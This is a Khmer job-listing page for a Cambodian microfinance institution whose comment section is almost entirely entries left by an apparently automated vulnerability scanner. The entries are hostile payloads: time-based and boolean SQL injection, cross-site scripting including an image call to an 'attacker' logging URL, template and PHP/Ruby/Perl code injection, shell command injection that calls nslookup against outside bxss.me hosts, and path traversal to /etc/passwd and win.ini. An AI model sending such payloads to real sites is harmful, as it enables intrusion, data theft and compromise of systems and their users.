ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

គ្រឹះស្ថានមីក្រូហិរញ្ញវត្ថុ ចម្រើន ម.ក
គ្រឹះស្ថានមីក្រូហិរញ្ញវត្ថុចំរើនគឺជាគ្រឹះស្ថានមីក្រូហិរញ្ញវត្ថុសង្គមឈានមុខគេមួយរបស់ប្រទេសកម្ពុជាដែលកំពុងធ្វើការដើម្បីទទួលបានការផ្លាស់ប្តូរជាវិជ្ជមាននិងយូរអង្វែងនៅក្នុងជីវភាពរស់នៅរបស់ប្រជាជនកម្ពុជា

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 141

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 104 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 07:35:06


  @@ziIYV


 • pHqghUme

  2021-05-06 07:34:55


  1'"


 • pHqghUme

  2021-05-06 07:34:51


  -1" OR 2+356-356-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:34:46


  -1' OR 2+395-395-1=0+0+0+1 or 'fWXq0IBw'='


 • pHqghUme

  2021-05-06 07:34:42


  -1' OR 2+599-599-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:34:38


  -1 OR 2+65-65-1=0+0+0+1


 • pHqghUme

  2021-05-06 07:34:34


  -1 OR 2+667-667-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:34:30


  W1tMDCwj


 • pHqghUme

  2021-05-06 07:33:57


  1


 • pHqghUme

  2021-05-06 07:33:38


  1


 • @@0ph0P

  2021-05-06 07:33:20


  1


 • 1'"

  2021-05-06 07:33:14


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:33:12


  1


 • 6HahknxY')) OR 254=(SELECT 254 FROM PG_SLEEP(15))--

  2021-05-06 07:32:50


  1


 • TnO4G3Sy') OR 972=(SELECT 972 FROM PG_SLEEP(15))--

  2021-05-06 07:32:29


  1


 • khLXKfDt' OR 250=(SELECT 250 FROM PG_SLEEP(15))--

  2021-05-06 07:32:08


  1


 • TlJZrHAg'; waitfor delay '0:0:15' --

  2021-05-06 07:31:51


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:31:31


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:31:11


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:30:40


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:30:20


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:29:58


  1


 • -1" OR 2+467-467-1=0+0+0+1 --

  2021-05-06 07:29:29


  1


 • -1' OR 2+507-507-1=0+0+0+1 or 'TfDCYQNV'='

  2021-05-06 07:29:27


  1


 • -1' OR 2+518-518-1=0+0+0+1 --

  2021-05-06 07:29:26


  1


 • -1 OR 2+64-64-1=0+0+0+1

  2021-05-06 07:29:25


  1


 • -1 OR 2+251-251-1=0+0+0+1 --

  2021-05-06 07:29:23


  1


 • P2qsgwsq

  2021-05-06 07:29:21


  1


 • pHqghUme

  2021-05-06 07:28:45


  1


 • pHqghUme

  2021-05-06 07:28:21


  1


 • pHqghUme

  2021-05-06 07:27:58


  1


 • pHqghUme

  2021-05-06 07:27:54


  1


 • pHqghUme

  2021-05-06 07:27:45


  1


 • pHqghUme

  2021-05-06 07:27:18


  1


 • pHqghUme

  2021-05-06 07:26:52


  1


 • pHqghUme

  2021-05-06 07:26:29


  1


 • pHqghUme

  2021-05-06 07:26:08


  1


 • pHqghUme

  2021-05-06 07:25:31


  1


 • pHqghUme

  2021-05-06 07:25:10


  1


 • pHqghUme

  2021-05-06 07:24:53


  1


 • pHqghUme

  2021-05-06 07:24:31


  1


 • pHqghUme

  2021-05-06 07:24:11


  1


 • pHqghUme

  2021-05-06 07:23:54


  1


 • pHqghUme

  2021-05-06 07:23:54


  1


 • pHqghUme

  2021-05-06 07:23:53


  1


 • pHqghUme

  2021-05-06 07:23:52


  1


 • pHqghUme

  2021-05-06 07:23:51


  1


 • pHqghUme

  2021-05-06 07:23:47


  1


 • pHqghUme

  2021-05-06 07:23:24


  1


 • pHqghUme

  2021-05-06 07:23:03


  1


 • pHqghUme

  2021-05-06 07:22:42


  1


 • pHqghUme

  2021-05-06 07:22:39


  1


 • pHqghUme

  2021-05-06 07:22:38


  1


 • pHqghUme

  2021-05-06 07:22:21


  1


 • pHqghUme

  2021-05-06 07:22:01


  1


 • pHqghUme

  2021-05-06 07:21:43


  1


 • pHqghUme

  2021-05-06 07:21:28


  1


 • pHqghUme

  2021-05-06 07:21:16


  1


 • pHqghUme

  2021-05-06 07:20:52


  1


 • pHqghUme

  2021-05-06 07:20:37


  1


 • pHqghUme

  2021-05-06 07:20:22


  1


 • pHqghUme

  2021-05-06 07:20:09


  1<pqjTFf<


 • pHqghUme

  2021-05-06 07:20:08


  1


 • pHqghUme

  2021-05-06 07:20:06


  1<img sRc='http://attacker-9382/log.php?


 • pHqghUme

  2021-05-06 07:20:03


  1<anRNhB x=9765>


 • pHqghUme

  2021-05-06 07:19:59


  1<ifRAme sRc=9309.com></IfRamE>


 • pHqghUme

  2021-05-06 07:19:56


  1<WDAXJZ>XMJWJ[!+!]</WDAXJZ>


 • pHqghUme

  2021-05-06 07:19:55


  1


 • pHqghUme

  2021-05-06 07:19:55


  1


 • pHqghUme

  2021-05-06 07:19:54


  1


 • pHqghUme

  2021-05-06 07:19:54


  1


 • pHqghUme

  2021-05-06 07:19:53


  1


 • pHqghUme

  2021-05-06 07:19:52


  1IKSlr <ScRiPt >Ii1c(9055)</ScRiPt>


 • pHqghUme

  2021-05-06 07:19:52


  1


 • pHqghUme

  2021-05-06 07:19:48


  1<% contenteditable onresize=Ii1c(9213)>


 • pHqghUme

  2021-05-06 07:19:44


  1}body{acu:Expre/**/SSion(Ii1c(9274))}


 • pHqghUme

  2021-05-06 07:19:41


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:19:39


  1


 • pHqghUme

  2021-05-06 07:19:38


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:19:34


  1<input autofocus onfocus=Ii1c(9990)>


 • pHqghUme

  2021-05-06 07:19:28


  1&lt;ScRiPt&gt;Ii1c(9680)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:19:25


  1


 • pHqghUme

  2021-05-06 07:19:24


  1\u003CScRiPt\Ii1c(9901)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:19:20


  %31%3C%53%63%52%69%50%74%20%3E%49%69%31%63%289834%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:19:16


  1<img/src=">" onerror=alert(9279)>


 • pHqghUme

  2021-05-06 07:19:12


  1<img src=xyz OnErRor=Ii1c(9421)>


 • pHqghUme

  2021-05-06 07:19:08


  1<img src=//xss.bxss.me/t/dot.gif onload=Ii1c(9168)>


 • pHqghUme

  2021-05-06 07:19:05


  1<body onload=Ii1c(9678)>


 • pHqghUme

  2021-05-06 07:19:01


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9831'>


 • pHqghUme

  2021-05-06 07:18:58


  1<isindex type=image src=1 onerror=Ii1c(9495)>


 • pHqghUme

  2021-05-06 07:18:52


  1<ScRiPt >Ii1c(9322)</ScRiPt>


 • pHqghUme

  2021-05-06 07:18:48


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9170></ScRiPt>


 • pHqghUme

  2021-05-06 07:18:44


  1<ScRiPt >Ii1c(9073)</ScRiPt>


 • pHqghUme

  2021-05-06 07:18:40


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%49%69%31%63%28%39%35%31%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:18:36


  1<script>Ii1c(9302)</script>


 • pHqghUme

  2021-05-06 07:18:31


  1<WZDD44>P9TK4[!+!]</WZDD44>


 • pHqghUme

  2021-05-06 07:18:23


  1<ScRiPt >Ii1c(9507)</ScRiPt>


 • pHqghUme

  2021-05-06 07:18:19


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:18:13


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:18:10


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:18:07


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:18:04


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:17:59


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:17:54


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:17:48


  acux10804%C0%BEz1%C0%BCz2a%90bcxuca10804


 • pHqghUme

  2021-05-06 07:17:44


  acu1826%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1826


 • pHqghUme

  2021-05-06 07:17:39


  19615239


 • pHqghUme

  2021-05-06 07:17:35


  '"()&%<acx><ScRiPt >Ii1c(9609)</ScRiPt>


 • pHqghUme

  2021-05-06 07:17:30


  1'"()&%<acx><ScRiPt >Ii1c(9682)</ScRiPt>


 • pHqghUme<umUgwL<

  2021-05-06 07:17:26


  1


 • pHqghUme<img sRc='http://attacker-9325/log.php?

  2021-05-06 07:17:22


  1


 • pHqghUme<Q9Q2J1 x=9922>

  2021-05-06 07:17:18


  1


 • pHqghUme<ifRAme sRc=9424.com></IfRamE>

  2021-05-06 07:17:15


  1


 • pHqghUme<WW0SNU>3A8DU[!+!]</WW0SNU>

  2021-05-06 07:17:11


  1


 • pHqghUme3Eqcc <ScRiPt >Ii1c(9632)</ScRiPt>

  2021-05-06 07:17:06


  1


 • pHqghUme<% contenteditable onresize=Ii1c(9620)>

  2021-05-06 07:17:02


  1


 • pHqghUme}body{acu:Expre/**/SSion(Ii1c(9661))}

  2021-05-06 07:16:58


  1


 • pHqghUme

  2021-05-06 07:16:56


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:16:53


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:16:49


  1


 • pHqghUme<input autofocus onfocus=Ii1c(9793)>

  2021-05-06 07:16:42


  1


 • pHqghUme

  2021-05-06 07:16:37


  1


 • pHqghUme&lt;ScRiPt&gt;Ii1c(9364)&lt;/sCripT&gt;

  2021-05-06 07:16:33


  1


 • pHqghUme\u003CScRiPt\Ii1c(9311)\u003C/sCripT\u003E

  2021-05-06 07:16:28


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%49%69%31%63%289176%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:16:21


  1


 • pHqghUme<img/src=">" onerror=alert(9620)>

  2021-05-06 07:16:11


  1


 • pHqghUme<img src=xyz OnErRor=Ii1c(9345)>

  2021-05-06 07:16:04


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=Ii1c(9404)>

  2021-05-06 07:15:55


  1


 • pHqghUme<body onload=Ii1c(9383)>

  2021-05-06 07:15:50


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9899'>

  2021-05-06 07:15:46


  1


 • pHqghUme<isindex type=image src=1 onerror=Ii1c(9619)>

  2021-05-06 07:15:42


  1


 • pHqghUme<ScRiPt >Ii1c(9153)</ScRiPt>

  2021-05-06 07:15:37


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9605></ScRiPt>

  2021-05-06 07:15:33


  1


 • pHqghUme<ScRiPt >Ii1c(9796)</ScRiPt>

  2021-05-06 07:15:29


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%49%69%31%63%28%39%32%30%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:15:26


  1


 • pHqghUme<script>Ii1c(9602)</script>

  2021-05-06 07:15:21


  1


 • pHqghUme<WDCOCE>OER0Q[!+!]</WDCOCE>

  2021-05-06 07:15:16


  1


 • pHqghUme<ScRiPt >Ii1c(9438)</ScRiPt>

  2021-05-06 07:15:11


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:15:06


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:15:02


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:14:58


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:14:53


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:14:45


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:14:40


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:14:35


  1


 • acux8825%C0%BEz1%C0%BCz2a%90bcxuca8825

  2021-05-06 07:14:29


  1


 • acu4280%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4280

  2021-05-06 07:14:23


  1


 • pHqghUme9580003

  2021-05-06 07:14:15


  1


 • '"()&%<acx><ScRiPt >Ii1c(9423)</ScRiPt>

  2021-05-06 07:14:09


  1


 • pHqghUme'"()&%<acx><ScRiPt >Ii1c(9523)</ScRiPt>

  2021-05-06 07:14:04


  1


 • pHqghUme

  2021-05-06 07:13:59


  1


 • pHqghUme

  2021-05-06 07:13:53


  1


 • pHqghUme

  2021-05-06 07:13:47


  1


 • pHqghUme

  2021-05-06 07:13:43


  1


 • pHqghUme

  2021-05-06 07:13:39


  1


 • pHqghUme

  2021-05-06 07:13:33


  1


 • pHqghUme

  2021-05-06 07:13:31


  '"


 • pHqghUme

  2021-05-06 07:13:31


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:13:31


  <!--


 • <!--

  2021-05-06 07:13:30


  1


 • pHqghUme

  2021-05-06 07:13:30


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:13:29


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:13:29


  1


 • '"

  2021-05-06 07:13:29


  1


 • pHqghUme

  2021-05-06 07:13:29


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:13:28


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:13:28


  1


 • pHqghUme

  2021-05-06 07:13:27


  1


 • '.print(md5(31337)).'

  2021-05-06 07:13:27


  1


 • pHqghUme

  2021-05-06 07:13:27


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 07:13:27


  1


 • pHqghUme

  2021-05-06 07:13:26


  /xfs.bxss.me


 • ${@print(md5(31337))}\

  2021-05-06 07:13:25


  1


 • pHqghUme

  2021-05-06 07:13:24


  1


 • ${@print(md5(31337))}

  2021-05-06 07:13:24


  1


 • /xfs.bxss.me

  2021-05-06 07:13:24


  1


 • pHqghUme

  2021-05-06 07:13:23


  '+'A'.concat(70-3).concat(22*4).concat(104).concat(66).concat(111).concat(85)+(require'socket' Socket.gethostbyname('hithr'+'kgcisbnjb996d.bxss.me.')[3].to_s)+'


 • ';print(md5(31337));$a='

  2021-05-06 07:13:23


  1


 • pHqghUme

  2021-05-06 07:13:23


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:13:23


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:13:22


  1


 • pHqghUme

  2021-05-06 07:13:22


  "+"A".concat(70-3).concat(22*4).concat(102).concat(73).concat(97).concat(72)+(require"socket" Socket.gethostbyname("hitas"+"urlpniml79132.bxss.me.")[3].to_s)+"


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:13:22


  1


 • pHqghUme

  2021-05-06 07:13:22


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 07:13:21


  1


 • pHqghUme

  2021-05-06 07:13:21


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:13:21


  1


 • '+'A'.concat(70-3).concat(22*4).concat(105).concat(68).concat(105).concat(68)+(require'socket' Socket.gethostbyname('hitbc'+'mtlffmakafef8.bxss.me.')[3].to_s)+'

  2021-05-06 07:13:21


  1


 • pHqghUme

  2021-05-06 07:13:21


  1


 • pHqghUme

  2021-05-06 07:13:20


  1


 • pHqghUme

  2021-05-06 07:13:20


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 07:13:20


  1


 • pHqghUme

  2021-05-06 07:13:20


  1


 • pHqghUme

  2021-05-06 07:13:20


  1


 • "+"A".concat(70-3).concat(22*4).concat(107).concat(71).concat(105).concat(67)+(require"socket" Socket.gethostbyname("hitpp"+"yiuhdkby48ee1.bxss.me.")[3].to_s)+"

  2021-05-06 07:13:20


  1


 • pHqghUme

  2021-05-06 07:13:20


  HttP://bxss.me/t/xss.html?%00


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:13:19


  1


 • pHqghUme

  2021-05-06 07:13:19


  1


 • pHqghUme

  2021-05-06 07:13:19


  1


 • pHqghUme

  2021-05-06 07:13:18


  1


 • pHqghUme

  2021-05-06 07:13:18


  1


 • pHqghUme

  2021-05-06 07:13:18


  1


 • pHqghUme

  2021-05-06 07:13:18


  1


 • pHqghUme

  2021-05-06 07:13:17


  1


 • pHqghUme

  2021-05-06 07:13:17


  1


 • pHqghUme

  2021-05-06 07:13:17


  1


 • pHqghUme

  2021-05-06 07:13:17


  1


 • pHqghUme

  2021-05-06 07:13:16


  1


 • pHqghUme

  2021-05-06 07:13:16


  1


 • pHqghUme

  2021-05-06 07:13:15


  1


 • pHqghUme

  2021-05-06 07:13:15


  '"()


 • pHqghUme

  2021-05-06 07:13:15


  1


 • pHqghUme

  2021-05-06 07:13:14


  1


 • pHqghUme

  2021-05-06 07:13:13


  '.gethostbyname(lc('hitjb'.'iqnmsgfg67e96.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(90).chr(119).chr(84).'


 • pHqghUme

  2021-05-06 07:13:13


  ".gethostbyname(lc("hitxy"."tpnotbap99957.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(71).chr(99).chr(66)."


 • '.gethostbyname(lc('hittr'.'pqvcxhkmc14ab.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(78).chr(104).chr(81).'

  2021-05-06 07:13:12


  1


 • ".gethostbyname(lc("hitpi"."mbglscyi865eb.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(73).chr(100).chr(65)."

  2021-05-06 07:13:12


  1


 • pHqghUme

  2021-05-06 07:13:11


  1


 • '"()

  2021-05-06 07:13:11


  1


 • pHqghUme

  2021-05-06 07:13:11


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 07:13:10


  )


 • pHqghUme

  2021-05-06 07:13:10


  1


 • pHqghUme

  2021-05-06 07:13:10


  !(()&&!|*|*|


 • ^(#$!@#$)(()))******

  2021-05-06 07:13:09


  1


 • pHqghUme

  2021-05-06 07:13:09


  1


 • !(()&&!|*|*|

  2021-05-06 07:13:08


  1


 • pHqghUme

  2021-05-06 07:13:08


  1


 • pHqghUme

  2021-05-06 07:13:08


  1


 • )

  2021-05-06 07:13:07


  1


 • pHqghUme

  2021-05-06 07:13:06


  1


 • pHqghUme

  2021-05-06 07:13:05


  1


 • pHqghUme

  2021-05-06 07:13:04


  1


 • pHqghUme

  2021-05-06 07:13:04


  1


 • pHqghUme

  2021-05-06 07:13:03


  1


 • pHqghUme

  2021-05-06 07:13:02


  1


 • pHqghUme

  2021-05-06 07:13:01


  1


 • pHqghUme

  2021-05-06 07:12:59


  `(nslookup hitxpujazvdfae342d.bxss.me||perl -e "gethostbyname('hitxpujazvdfae342d.bxss.me')")`


 • pHqghUme

  2021-05-06 07:12:58


  |(nslookup hitxxqwkzgflz4d7af.bxss.me||perl -e "gethostbyname('hitxxqwkzgflz4d7af.bxss.me')")


 • pHqghUme

  2021-05-06 07:12:58


  1&n965244=v979256


 • pHqghUme

  2021-05-06 07:12:55


  bxss.me


 • pHqghUme

  2021-05-06 07:12:54


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:12:54


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:12:53


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 07:12:53


  1some_inexistent_file_with_long_name%00.jpg


 • bxss.me

  2021-05-06 07:12:52


  1


 • pHqghUme&n900697=v965726

  2021-05-06 07:12:52


  1


 • pHqghUme

  2021-05-06 07:12:51


  $(nslookup hitjcuceygbta2903d.bxss.me||perl -e "gethostbyname('hitjcuceygbta2903d.bxss.me')")


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:12:51


  1


 • pHqghUme

  2021-05-06 07:12:50


  (nslookup hitnoslxnsxlvab8b0.bxss.me||perl -e "gethostbyname('hitnoslxnsxlvab8b0.bxss.me')")


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:12:50


  1


 • pHqghUme

  2021-05-06 07:12:49


  |echo zyycsw$()\ utgptc\nz^xyu||a #' |echo zyycsw$()\ utgptc\nz^xyu||a #|" |echo zyycsw$()\ utgptc\nz^xyu||a #


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:12:49


  1


 • pHqghUme

  2021-05-06 07:12:48


  echo kacbqj$()\ nokjes\nz^xyu||a #' &echo kacbqj$()\ nokjes\nz^xyu||a #|" &echo kacbqj$()\ nokjes\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:12:48


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:12:48


  1


 • pHqghUme

  2021-05-06 07:12:48


  &echo qojfvs$()\ pcfyiy\nz^xyu||a #' &echo qojfvs$()\ pcfyiy\nz^xyu||a #|" &echo qojfvs$()\ pcfyiy\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:12:47


  1


 • pHqghUme

  2021-05-06 07:12:46


  1


 • pHqghUme

  2021-05-06 07:12:46


  1


 • pHqghUme

  2021-05-06 07:12:45


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 07:12:45


  1


 • `(nslookup hitcbrmpodbzx4e82b.bxss.me||perl -e "gethostbyname('hitcbrmpodbzx4e82b.bxss.me')")`

  2021-05-06 07:12:44


  1


 • pHqghUme

  2021-05-06 07:12:44


  1


 • pHqghUme

  2021-05-06 07:12:43


  1


 • |(nslookup hitctiifgopei3c3ce.bxss.me||perl -e "gethostbyname('hitctiifgopei3c3ce.bxss.me')")

  2021-05-06 07:12:43


  1


 • pHqghUme

  2021-05-06 07:12:43


  1


 • pHqghUme

  2021-05-06 07:12:42


  1


 • pHqghUme

  2021-05-06 07:12:41


  1


 • pHqghUme

  2021-05-06 07:12:41


  1


 • pHqghUme

  2021-05-06 07:12:40


  1


 • ckJLdkRhSFU=

  2021-05-06 07:12:37


  1


 • $(nslookup hitcwhwyevvyv9381e.bxss.me||perl -e "gethostbyname('hitcwhwyevvyv9381e.bxss.me')")

  2021-05-06 07:12:37


  1


 • (nslookup hitjblnwcyhvt722e3.bxss.me||perl -e "gethostbyname('hitjblnwcyhvt722e3.bxss.me')")

  2021-05-06 07:12:36


  1


 • |echo ynywfs$()\ tmtikl\nz^xyu||a #' |echo ynywfs$()\ tmtikl\nz^xyu||a #|" |echo ynywfs$()\ tmtikl\nz^xyu||a #

  2021-05-06 07:12:35


  1


 • &echo oavtaz$()\ wlhnjr\nz^xyu||a #' &echo oavtaz$()\ wlhnjr\nz^xyu||a #|" &echo oavtaz$()\ wlhnjr\nz^xyu||a #

  2021-05-06 07:12:34


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:12:34


  1


 • echo riapzx$()\ djuwor\nz^xyu||a #' &echo riapzx$()\ djuwor\nz^xyu||a #|" &echo riapzx$()\ djuwor\nz^xyu||a #

  2021-05-06 07:12:33


  1


 • pHqghUme

  2021-05-06 07:12:29


  ${10000236+9999622}


 • ${10000399+10000147}

  2021-05-06 07:12:28


  1


 • pHqghUme

  2021-05-06 07:12:27


  1


 • pHqghUme

  2021-05-06 07:12:27


  1


 • pHqghUme

  2021-05-06 07:12:26


  1


 • pHqghUme

  2021-05-06 07:12:26


  1


 • pHqghUme

  2021-05-06 07:12:24


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:12:24


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:12:23


  1


 • pHqghUme

  2021-05-06 07:12:22


  1


 • pHqghUme

  2021-05-06 07:12:22


  1


 • pHqghUme

  2021-05-06 07:12:22


  1


 • pHqghUme

  2021-05-06 07:12:21


  1


 • pHqghUme

  2021-05-06 07:12:21


  1


 • pHqghUme

  2021-05-06 07:12:20


  ../1


 • pHqghUme

  2021-05-06 07:12:20


  1


 • pHqghUme

  2021-05-06 07:12:19


  1


 • pHqghUme

  2021-05-06 07:12:19


  1


 • pHqghUme

  2021-05-06 07:12:18


  ../../../../../../../../../../../../../../windows/win.ini


 • ../pHqghUme

  2021-05-06 07:12:17


  1


 • pHqghUme

  2021-05-06 07:12:17


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:12:16


  1


 • pHqghUme

  2021-05-06 07:12:16


  1


 • pHqghUme

  2021-05-06 07:12:15


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:12:15


  1


 • pHqghUme

  2021-05-06 07:12:15


  1


 • pHqghUme

  2021-05-06 07:12:15


  1


 • pHqghUme

  2021-05-06 07:12:14


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:12:14


  1


 • pHqghUme

  2021-05-06 07:12:12


  1


 • pHqghUme

  2021-05-06 07:12:12


  1


 • pHqghUme

  2021-05-06 07:12:11


  1


 • pHqghUme

  2021-05-06 07:12:11


  1


 • pHqghUme

  2021-05-06 07:12:11


  1


 • pHqghUme

  2021-05-06 07:12:10


  1


 • pHqghUme

  2021-05-06 07:12:10


  1


 • pHqghUme

  2021-05-06 07:12:09


  1


 • pHqghUme

  2021-05-06 07:12:09


  1


 • pHqghUme

  2021-05-06 07:12:08


  1


 • pHqghUme

  2021-05-06 07:12:08


  1


 • pHqghUme

  2021-05-06 07:12:08


  1


 • pHqghUme

  2021-05-06 07:12:07


  1


 • pHqghUme

  2021-05-06 07:12:06


  1


 • pHqghUme

  2021-05-06 07:12:01


  1


 • pHqghUme

  2021-05-06 07:11:59


  ePWxWWAF


 • kXaFUj22

  2021-05-06 07:11:58


  1


 • pHqghUme

  2021-05-06 07:11:57


  1


 • pHqghUme

  2021-05-06 07:11:57


  1


 • pHqghUme

  2021-05-06 07:11:55


  "+response.write(9274825*9264152)+"


 • pHqghUme

  2021-05-06 07:11:54


  '+response.write(9274825*9264152)+'


 • pHqghUme

  2021-05-06 07:11:53


  response.write(9274825*9264152)


 • "+response.write(9887027*9802773)+"

  2021-05-06 07:11:52


  1


 • '+response.write(9887027*9802773)+'

  2021-05-06 07:11:51


  1


 • pHqghUme

  2021-05-06 07:11:50


  1


 • response.write(9887027*9802773)

  2021-05-06 07:11:50


  1


 • pHqghUme

  2021-05-06 07:11:49


  1


 • pHqghUme

  2021-05-06 07:11:49


  1


 • pHqghUme

  2021-05-06 07:11:48


  1


 • pHqghUme

  2021-05-06 07:11:48


  1


 • pHqghUme

  2021-05-06 07:11:47


  1


 • pHqghUme

  2021-05-06 07:11:46


  1


 • pHqghUme

  2021-05-06 07:11:35


  1o2b7cdnO


 • 1dGdPEhLO

  2021-05-06 07:11:33


  1


 • pHqghUme

  2021-05-06 07:11:32


  1


 • pHqghUme

  2021-05-06 07:11:32


  1


 • pHqghUme

  2021-05-06 06:29:20


  1


 • pHqghUme<20798G<

  2021-05-06 02:52:44


  1


 • pHqghUme<img sRc='http://attacker-9760/log.php?

  2021-05-06 02:52:29


  1


 • pHqghUme<RTcq1i x=9258>

  2021-05-06 02:52:13


  1


 • pHqghUme<ifRAme sRc=9423.com></IfRamE>

  2021-05-06 02:52:00


  1


 • pHqghUme<WY6M7Q>GHDEI[!+!]</WY6M7Q>

  2021-05-06 02:51:45


  1


 • pHqghUmeuLQG6 <ScRiPt >D62f(9657)</ScRiPt>

  2021-05-06 02:51:30


  1


 • pHqghUme<% contenteditable onresize=D62f(9513)>

  2021-05-06 02:51:15


  1


 • pHqghUme}body{acu:Expre/**/SSion(D62f(9282))}

  2021-05-06 02:51:00


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 02:50:44


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 02:50:26


  1


 • pHqghUme<input autofocus onfocus=D62f(9550)>

  2021-05-06 02:50:10


  1


 • pHqghUme&lt;ScRiPt&gt;D62f(9413)&lt;/sCripT&gt;

  2021-05-06 02:49:40


  1


